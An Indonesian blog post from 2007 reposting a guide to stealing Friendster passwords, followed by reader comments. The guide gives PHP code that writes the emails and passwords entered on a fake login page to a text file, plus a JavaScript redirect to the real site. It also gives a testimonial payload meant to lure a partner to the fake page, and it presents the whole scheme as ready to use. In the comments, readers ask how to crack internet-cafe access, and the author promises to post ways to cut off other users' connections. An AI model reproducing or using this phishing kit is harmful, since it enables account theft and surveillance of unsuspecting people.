Sabtu 7 April 2007

Hola,,,
Setelah mencari ide apa yang artikel apa yang harus dimasukan kedalam blog saya.
akhirnya saya memutuskan untuk mencari artikel tentang cara menghacking passwor
d Friendster karena banyak teman - teman saya yang menyarankan untuk memasukan a
rtikel tersebut agar mereka mudah untuk membacanya tanpa perlu memakai search en
gine segala. dan setelah goggling sejenak akhirnya saya dapat juga di jasakom.co
m. nah ini dia selamat membaca. GBU Penerapan Social Engineering untuk mendapat
kan password di Friendster
Date: Wednesday, February 14, 2007 Hits: 14195 By: numpang_lewat
Artikel ini ditujukan bahwa
Hacking tidak selamanya menggunakan TOOLS . So bagi p
ara 3133t sebaiknya tidak membaca ARTIKEL ini jika anda tidak ingin mual, perut
kembung, bibir pecah2, kepala senut2.. dll.
Artikel ini diperuntunkan bagi anda tertarik, cinta, haus ilmu dari Social Engin
eering .
Sekali lagi Artikel ini hanya ditujukan bagi temen2 yg belum mengetahui teknik i
ni. Jika temen2(terutama for 3133t) Sudah tahu teknik ini SAYA MOHON STOP!! STOP
!! STOP!! STOP!! STOP!! STOP!! tetapi bila anda tetap sja Ngotot ingin meneruska
n saya tidak bisa memaksa anda
Lanjutt

Akhir-akhir ini banyak yg membicarakannya, bahkan sedang menjadi berita hangat.

Mngkin para 3133t sudah menemukannya hampir 2 tahun yg lalu. Sebagaimna telah di
jelaskan pada artikel sebelumnya (WuPz, jagonya dll). Testimonial Redirect bisa
jadi berabe bgt kalo disalah gunakan. Artinya?? cara tersebut bisa digunain buat
ngedapetin password, cookies, or perhatian lebih dari doi ama kita ;)) n laen-l
aen .. .
So langsung saja kita menuju acara puncak
Pertama-tama yg mesti kita siapin :
1.
2.
3.
4.

Teh manis penghangat malam.

Jangan Lupa cemilan yg bikin Kriuk .. kriuk
Web Hosting yg support PHP. Cari di paman Google banyak..
Upload file index.htm (ada di source).

5. Sertakan code php dan JavaScript di bawah ini dan

yg dituju pada Form Login.
<?php
$email = $_POST[email];
$password = $_POST[password];
$fl = fopen( password.txt , a );
fwrite($fl, $email . $password \n\n );
fclose($fl);
?>
<SCRIPT LANGUAGE= JavaScript >
window.location= http://www.friendster.com/index.php ;
</script>
Dan upload file diatas ke www.webyangsupportphp.com

SAVE As

sesuai dg nama link

6. Buat file Text kosong dengan nama Sesuai perintah Open pada php code di atas.
Jangan lupa CHMOD diganti sesuai dg kebutuhan kamu!!.
7. kirim testi dg :
hai syang .. gimna kabarna, kagen nie .. <img id= XcodeCommunity

width= 0?>

nah .. Setelah sang pacar penerima testi membuka New Testimonials , maka sesuai dg
perintah yang berada di JavaScript => window.location <= yg disisipkan maka link
akan menuju ke http://webyangsupportphp.com/index.htm . setelah terbuka, secara
tanpa sadar sang pacar mengira halaman yg terbuka adalah sungguhan. Ya !!!! tan
pa disuruh, dibelai-belai, n tanpa rayuan maut pun sang pacar akan dg rela hati
mengisi Form login tipuan.
Akhirnya dg pura-pura tidak tahu, muka bego, sedikit bodoh. Si pengirim testi me
nawarkan jasanya untuk sang pacar tercinta =] :))
Selain itu teknik diatas akan terlihat seperti aslinya jika menggunakan
OVERLAY
GENERATOR pada profil fs pada saat pengiriman testimonial yg berisi html code (
index.htm). Dg mengganti link Relatif menjadi absolut(baca S.I.H lebih lanjut) p
ada form login di index.htm maka pada saat pengiriman data akan menuju ke http:/
/webyangsupportphp.com/login.php
Kesimpulan :
# Hacking tidak selamanya menggunakan
TOOLS
# Kelemahan XSS merupakan bahaya besar
# Teknik ini semata-mata hanya untuk pengetahuan. Resiko ditanggung anda sendiri
!!!!
Thanks To :
Allah SWT
-V-i-e- My Queen
$Jasakom Community
$Aat Shadewa - thanks 4 your knowledge.
$Xcode Community
$h_iem_ura, daddy, otoy s, rahmat-mh, n 2 friends that can t be says one by one.
$komp butut gw!!
$$$ Knowledge is belongs to world $$$
Download
###numpang_lewat###
Source: JASAKOM Information Center
66 Comments so far
x-an on April 14th, 2007
kalo ga ada testinya piye?
x-an on April 14th, 2007
maksudnya yang di fs tuh loh apa lewat comment, tapi ntar scriptnya kelihatan kan
ga seru
btw gimana belajar bikin sst yang support php
ada cara ga buat nge crack signal warnet, biar bisa gratis gitu

Script tadi di masukin barengan dengan Testimonial ada juga yang menggunakan tek
nik
yang masuk melalui Kelemahan pada XSS. untuk warnet ada juga untuk mempercepat d
ownload atau mematikan
internet pada komputer lain namun yang nyala cuma komp kita saja. nanti akan say
a postkan
neolisense on April 18th, 2007
Wah, wah, kayaknya loe lebih pintar dalam ngehack ya ^-^
Gw ambil ya bwt gw pelajarin, tapi tenang ja, gw gak kan masukin ke BLOGS gw kok
, OKE
Salam NEO
^-^
yah boleh-boleh saja kalau mas mau ngopy dari blog saya tapi jangan lupa cantumin
sumbernya
yah mas ok..GBU
x-an on April 19th, 2007
gini bang lagi soal fs,.. yang sekarang ini kan ga ada testimonialnya
coba ae buka
artinya kita ga akan bisa hack lagi lewat testi, yang ada cuma comment, digabung
deh kayaknya .
Setelah saya konfirmasi dengan pihak friendster kenapa sekarang FS menghilangkan
fasilitas Testimonial. Ternyata di daerah kanton di cina ada laporan kalau bukan
hanya satu orang
tapi sampai puluhan orang yang FSnya di rubah melalui kelemahan pada Tag bwt tes
ti itu jd mereka
memilih merubahnya dgn comment saja biar aman katanya
x-an on April 19th, 2007
o iya lupa bilang thanks
Ncrut on April 21st, 2007
Ngomongin masa masa prasejarah ya???????????
katanya di indonesia dulu .
Homo erektus javanicus juga udah bikin blog kaya gini .
tapi dia gak copi paste .
dia pake nya FotoCopy
Hua..ha ha..ha ha .ha h.a..h.a .h.a..ha.
h.a.h.a.ha.h.a.h.ah.a.h.a.ha
.h.a.ha.h.a.h.a.
ha.h.a.
ha..akha..ahk ahk adu keselek khoek khoek
yah maklum mas saya juga baru belajar bikin blog kaya gini,
ini juga cuman tugas akhir di sekolah saya makanya saya tidak
begitu serius menanggapinya GBU :)